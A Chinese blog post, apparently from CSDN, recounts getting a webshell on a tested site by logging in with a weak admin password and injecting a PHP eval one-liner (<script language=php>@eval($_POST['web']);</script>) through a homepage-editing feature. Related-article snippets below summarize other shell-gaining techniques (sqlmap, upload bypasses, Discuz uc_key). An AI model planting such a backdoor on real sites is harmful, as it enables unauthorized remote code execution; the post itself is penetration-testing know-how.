关于js拿shell的尝试

最新推荐文章于 2024-06-06 09:53:04 发布
最新推荐文章于 2024-06-06 09:53:04 发布
阅读量2.8k 收藏 1
点赞数
分类专栏: 信息安全 文章标签: 拿shell js拿shell 拿shell方法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18501087/article/details/89811397
版权

以前在测试一个网站的时候,大佬提供了一个拿shell的思路,通过js拿到了shell。

当时的情况是这样的,首页为*****/bin/home.php,通过弱口令进入后台,后台所有上传等可以拿shell的路都被阻止了,当时有一个可以控制前端页面的功能点
在这里插入图片描述

凭上面的解释就可以看出来,这个是可以通过这里来修改首页内容的,这里仅仅做一个小演示
在这里插入图片描述
在这里插入图片描述
可以发现js的代码是可以成功执行的,就可以通过了这个方法来拿shell了,因为js的language参数是可以支持其他的语言的执行的,具体的可以自己去尝试,这里我们使用的是

<script language=php>@eval($_POST['web']);</script>

我在本地进行一次测试,就可以展现出效果了
在这里插入图片描述

最低0.47元/天 解锁文章
Vesel『无心』
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
js执行shell命令的几种方式(Node)
cindy647的博客
09-27 4万+
在做一个客户端基建项目的时候,多处需要用到JS调取命令行执行shell脚本,这里对shell命令、JS执行shell命令做一个简单的介绍和总结。 前言 一般在纯前端静态页面的项目中,是不需要JS调命令行操作的,通常在Node项目,或者在Electron客户端项目中,可能会有这样的需求。(electron这个客户端框架本身就内置了node的很多方法)。因此下文针对的是有node层的项目如何执行shell。 先来了解一下shell是什么? Linux/Unix中的shell,翻译是’壳’的意思;shell.
shelljs库使用js达到linux命令操作
weixin_43294560的博客
03-04 1407
基本语法 //引入shelljs var shell = require('shelljs') //检查控制台是否以运行`git `开头的命令 if (!shell.which('git')) { //在控制台输出内容 shell.echo('Sorry, this script requires git'); shell.exit(1); } shell.rm('-rf','out/Release
使用JavaScript轻松调用API的Webshell平台
最新发布
gitblog_00097的博客
06-06 365
使用JavaScript轻松调用API的Webshell平台 项目地址:https://gitcode.com/webshell/APIs 项目介绍 在开发Web和移动应用的过程中,您是否曾经希望有一种方式能统一客户端与服务器端的语言,让生活变得更加简单?Webshell项目正是为此而生。基于Node.js构建,Webshell允许您使用JavaScript这一广泛应用于浏览器端API的语言,无缝...
sqlmap拿shell
goddemon
06-20 2506
sqlmap5种思路拿shell总结 ①利用dump 管理员类的账户后进入进行站点后拿shell 或者拿到账户后远程连接进行连接进行udf类提取类拿shell #连接方法 sqlmap -d “mysql://admin:password@192.168.1.1:3306/security” admin是账号,psw是密码,后面是地址和端口,security数据库。我们数据库可以用current-db来查看 ②利用os-shellshell 条件①知绝对路径 ②管理员权限 ③开启 ③
网站后台拿shell方法总结
热门推荐
一小平民
03-18 1万+
今日带给大伙的都是些手艺上的总结,有些人老问经验怎么来的,这个即是经验,盼愿大伙都能成为脚本妙手. 动网上传漏洞,信任大伙拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然全国,现在这种漏洞已经根柢斗劲难见到了,不扫除一些小网站模拟仍是存在此漏洞。在拿站历程中,我们凡是费了九牛两虎之力拿到办理员帐号和密码,并顺遂进入了后台,当然此时与拿到网站webshell还有一步之遥
shell中执行简单javascript
业精于勤
01-05 1251
如果你想在命令行执行javascript怎么办呢?比如在shell中 下面的方法也许对你有帮助 1、安装java、javac【如果你的系统里没有安装的话】 [code="java"] yum install java-1.6.0-sun.x86_64 java-1.6.0-sun-devel.x86_64 [/code] 2、准备java程序RunScriptFile.java...
jssh:JavaScript Shell
05-09
JavaScript Shell JavaScript中的shell,您的shell和脚本使用JavaScript而不是BASH。 该项目正处于早期开发阶段。 使用风险自负。 该项目的许多部分将在未来发生变化。安装作为全局npm软件包安装。 npm install -g ...
js利用shell命令操作
06-24
在描述中提到的问题是,当尝试在Web服务器上使用JavaScript执行shell命令时,由于IE的安全设置,可能会遇到“服务器不能创建对象”的错误。这是因为IE默认禁止了外部网络的ActiveX控件执行,以防止潜在的安全风险。...
js-shell-0.2.zip
04-16
"js-shell-0.2.zip" 是一个包含JavaScript运行环境的压缩包,旨在提升JavaScript代码的编写体验,使其更接近于Java开发的模式。这个工具可能提供了类Java的语法结构和开发工具,使得开发者能够在JavaScript中实现...
jsh:JavaScript Shell
02-24
JavaScript Shell,简称jsh,是一种基于JavaScript的命令行工具,它允许用户在命令行环境下运行JavaScript代码,类似于Python的交互式解释器。这个工具对于开发者来说非常实用,特别是在进行快速原型开发、测试代码...
8145v改华为界面补shell
01-27
在这个特定的场景下,"8145v改华为界面补shell"意味着用户或技术人员正在尝试对8145V光猫进行以下操作: 1. **替换界面**:通过技术手段,将8145V的默认管理界面更换为华为的界面,这通常涉及到Web服务器的配置、...
shell脚本进行js和css的压缩
08-24
js css压缩
弱口令上传shell_关于jsshell尝试
weixin_39747615的博客
01-13 82
以前在测试一个网站的时候,大佬提供了一个拿shell的思路,通过js拿到了shell。当时的情况是这样的,首页为*****/bin/home.php,通过弱口令进入后台,后台所有上传等可以拿shell的路都被阻止了,当时有一个可以控制前端页面的功能点凭上面的解释就可以看出来,这个是可以通过这里来修改首页内容的,这里仅仅做一个小演示可以发现js的代码是可以成功执行的,就可以通过了这个方法来...
利用文件上传拿shell和绕过的一些思路总结
qq_40529133的博客
04-10 2046
一,利用文件解析漏洞 二,上传本地验证绕过 三,上传服务器端验证绕过 1 ,文件解析漏洞 解析漏洞主要说的是一些特殊文件被“IIS,Apache,Nginx”在某种情况下解释成脚本文件格式的漏洞。 像IIS,Apache,Nginx这些容器在特定版本下是存在解析漏洞的。像IIS5.X/6.0这些老版本都存在解析漏洞。 IIS6.0解析利用方法有两种 1,目录解析 /xx.asp/xx.jpg。在网...
拿webshell
xlh006的博客
09-12 2648
一、什么是webshell webshell简介 webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据库,甚至...
DZ拿shell总结
weixin_30600503的博客
01-23 774
今天碰到一个dz的站,好久没拿了 ,拿下shell觉得应该总结一下 Uc_server默认密码 其实有了UC_SERVER就是有了网站的全部权限了,有了UC_SERVER你可以重置管理员密码 可以进后台拿shell,当然你也可以不进后台拿,因为我觉得UC_server更好拿 先说一下UCkey拿shell,uckey可以进uc_server后台看 附一张dz3的图 当然有了uc-serv...
超牛逼!100 个开箱即用的 Shell 脚本,拿好了~
民工哥的博客
04-30 3516
点击下方公众号「关注」和「星标」回复“1024”获取独家整理的学习资料!shell脚本是帮助程序员和系统管理员完成费时费力的枯燥工作的利器,是与计算机交互并管理文件和系统操作的有效方式。区...
使用ShellJS提升你的开发效率(一)
weixin_33980459的博客
05-20 1万+
Shelljs - Unix shell commands for Node.js Shelljs是Node.js下的脚本语言解析器,具有丰富且强大的底层操作(Windows/Linux/OS X)权限。Shelljs本质就是基于node的一层命令封装插件,让前端开发者可以不依赖linux也不依赖类似于cmder的转换工具,而是直接在我们最熟悉不过的javascript代码中编写shell命令...
使用Javascript shell解释执行js代码
weixin_41763944的博客
08-06 4189
最近,算法小白在跟着《数据结构与算法javascript描述》这本书学习算法知识。 首先,小白就被难住了。这个js shell是个什么玩意儿。故鼓捣了半天,又几个小时过去了。。。 终于会用了。。写下来,大家自取。也是为了让我自己不会忘记。。。毕竟记性不大忘性大的我。。 1.下载一个符合自己电脑系统的js shell,书里的地址尝试了半天并没有打开,心塞塞,我以为我学校的网络崩掉了。下面的地址...
使用 python-shell 运行没有任何反应
07-10
4. 确保 Python 脚本本身可正常运行:尝试在终端或命令提示符中直接运行你的 Python 脚本,确保它能够正常执行,而不依赖于 `python-shell`。 请检查上述问题,并尝试解决它们。如果问题仍然存在,请提供更多的信息...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值